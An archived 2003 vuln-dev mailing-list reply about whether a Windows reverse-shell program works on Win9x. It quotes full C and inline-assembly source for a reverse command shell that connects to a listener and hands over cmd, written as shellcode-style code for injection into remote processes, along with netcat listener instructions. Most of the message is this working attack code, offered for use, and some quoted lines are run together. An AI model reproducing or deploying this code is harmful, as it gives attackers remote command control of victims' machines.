
Re[2]: Windows reverse Shell #2

From: NetNinja <netninja(at)hotmail.kg>
Date: Sat Feb 08 2003 - 02:11:26 EST

Hello s7726,

Saturday, February 8, 2003, 12:09:45 AM, you wrote:

s> Could this work on a win9x machine? With some mods of course, namely command
s> rather than cmd, or is this strictly an NT/2k thing?

s> Thanx,
s> Gavin S.

s> -----Original Message-----
s> From: NetNinja [mailto:netninja@hotmail.kg]
s> Sent: Friday, February 07, 2003 4:45 AM
s> To: vuln-dev@securityfocus.com
s> Subject: Windows reverse Shell #2

s> Hello folks,

s> Thnx everyone for ur replies.
s> Today i found time to have a careful look at my reverse shell C source
s> code. The problem that i had was very simple. In my C source i forgot to
s> initialize the STARTUPINFO struct to zero. That was the problem. 3APA3A's
s> code did initialize that struct, so big thnx to him. Another thing
s> u have to do is to cast the socket handle returned from the WSASocket call to
s> a ptr type and pass it on to the hStdInput, hStdOutput and hStdError fields of the
s> STARTUPINFO struct.
s> That's it!
s> If anyone is interested in reverse cmd shell for windows i have
s> included both C and inline asm version. so have a look at them.

s> ---- C ---------------

s> /*
s> reverse cmd shell

s> Will spit back a command shell on ur listening netcat
s> on ur localhost (127.0.0.2) port 55

s> set up ur netcat eg. nc -l -p 55 -vv


s> Adik (netninja@hotmail.kg)
s> http://netninja.to.kg

s>   */
s> #include 
s> #include 
s> #pragma comment(lib,"ws2_32")

s> void main(int argc, char *argv[])
s> {
s>         WSADATA wsaData;
s>         SOCKET hSocket;
s>         STARTUPINFO si;
s>         PROCESS_INFORMATION pi;
s>         struct sockaddr_in adik_sin;
s>         memset(&adik_sin,0,sizeof(adik_sin));
s>         memset(&si,0,sizeof(si));
s>         WSAStartup(MAKEWORD(2,0),&wsaData);
s>         hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
s>         adik_sin.sin_family = AF_INET;
s>         adik_sin.sin_port = htons(55);
s>         adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1");
s>         connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
s>         si.cb = sizeof(si);
s>         si.dwFlags = STARTF_USESTDHANDLES;
s>         si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
s>         CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
s> ExitProcess(0);

s> }

s> ------[ end C ]--------------

s> ----[ inline ASM ]------
s> /*
s> reverse cmd shell
s> inline asm version

s> reverse cmd shell on address 127.0.0.1 port 55

s> Adik (netninja@hotmail.kg)
s> http://netninja.to.kg

s> */

s> #include 
s> #include 
s> #pragma comment(lib,"ws2_32")

s> #define GP      0x77E7B332
s> #define LL  0x77E7D961
s> #define CreateProcessA          [ebp-8]
s> #define ExitProcess             [ebp-0ch]
s> #define WSASocketA              [ebp-10h]
s> #define connect                 [ebp-14h]
s> #define CMD_STR                 [ebp-18h]
s> #define PORT                    0x3700          //(htons(55)) here u gotta
s> reverse byte order 0x0037=3700
s> #define IPADDR                  0x0100007F      //
s> 7F000001//(inet_addr("127.0.0.1"))
s> void main(int argc, char *argv[])
s> {
s>     char ptr[] = "kernel32\0CreateProcessA\0ExitProcess\0\0"
s>                  "ws2_32\0WSASocketA\0connect\0\0\0cmd\0\0\0";
s>         char *i=ptr;

s>         WSADATA wsaData;
s>         WSAStartup(MAKEWORD(2,0),&wsaData);             //initialize
s> winsock, this is not done below

s> // usually when u inject ur shellcode into remote process

s> // socket is already initialized
s>         __asm
s>         {

s>                 mov edi, i
s>                 dec edi

s>                 push ebp
s>                 mov ebp,esp
s>                 sub esp,0x20

s>                 mov ecx,ebp
s>                 sub ecx,4h
s>                 push ecx

s> load_lib:
s>                 inc edi
s>                 cmp byte ptr[edi],0
s>                 je done_loadin

s>                 push edi
s>                 mov eax, LL
s>                 call eax                        //LoadLibrary("Lib")

s>                 mov [ebp-4],eax         //places lib handle into ebp-4
s>                 xor eax,eax
s>                 repne scasb

s> load_func:

s>                 cmp byte ptr[edi],0
s>                 je load_lib

s>                 push edi

s>                 mov ebx, dword ptr[ebp-4] //lib handle
s> push ebx s> mov eax, GP s> call eax

s> //GetProcAddress("Function")
s>                 pop ecx
s>                 sub ecx,4
s>                 mov dword ptr[ecx], eax
s>                 push ecx
s>                 xor eax,eax
s>                 repne scasb

s>                 jmp load_func

s> done_loadin:

s>                 xor eax,eax
s>                 inc edi
s>                 mov dword ptr[ebp-18h],edi
s>                 mov ecx,50                                      //make some
s> space for structs
s> push_em:
s>                 push eax
s>                 loop push_em

s>                 push 0x1
s>                 push 0x2
s>                 call WSASocketA

s>                 mov ebx, eax            //copies sockethandle returned into
s> ebx
s>                   //ebp-20h
s>                 mov dword ptr[ebp-40h],0x2
s> //sockaddr_in
s>                 mov word ptr[ebp-3Eh],PORT
s>                 mov dword ptr[ebp-3Ch],IPADDR

s>                 //mov dword ptr[ebp-40h],process_information

s>                 mov dword ptr[ebp-94h],0x44             //sizeof startupinfo
s>                 mov dword ptr[ebp-68h],0x100    //dwFlags
s>                 mov dword ptr[ebp-5Ch],ebx              //stdio
s>                 mov dword ptr[ebp-58h],ebx              //stdout
s>                 mov dword ptr[ebp-54h],ebx              //stderr

s>                 push 0x10
s> //sizeof sockaddr_in
s>                 lea edx, dword ptr[ebp-40h]
s>                 push edx
s> //ptr to sockaddr_in
s>                 push ebx
s> //socket handle
s>                 call connect

s>                 lea edx,dword ptr[ebp-50h]
s>                 push edx                                        //push
s> proc_info
s>                 lea edx,dword ptr[ebp-94h]
s>                 push edx                                        //push ptr
s> to startupinfo s> xor edx,edx s> push edx s> push edx s> push edx s> inc edx s> //inheritHandles = true s> push edx s> dec edx s> push edx s> push edx s> mov eax,CMD_STR //ptr to "cmd" str s> push eax s> push edx s> call CreateProcessA s> push edx s> call ExitProcess s> }

s> }

s> ----[ end ]------

s> --
s> Best regards,
s>  Adik        (NetNinja)                          mailto:netninja@hotmail.kg

When i put command.com instead of cmd.exe as the parameter to CreateProcess, a reverse command shell appeared on my nc; however, i failed to execute any command and see the results. In addition, my nc stopped responding and CPU usage jumped to 100%, so i had to shut it down. But u can try playing and poking around with it; perhaps u will see different results.

-- 
Best regards,
 NetNinja                            mailto:netninja@hotmail.kg
Received on Sun Feb 9 19:02:16 2003


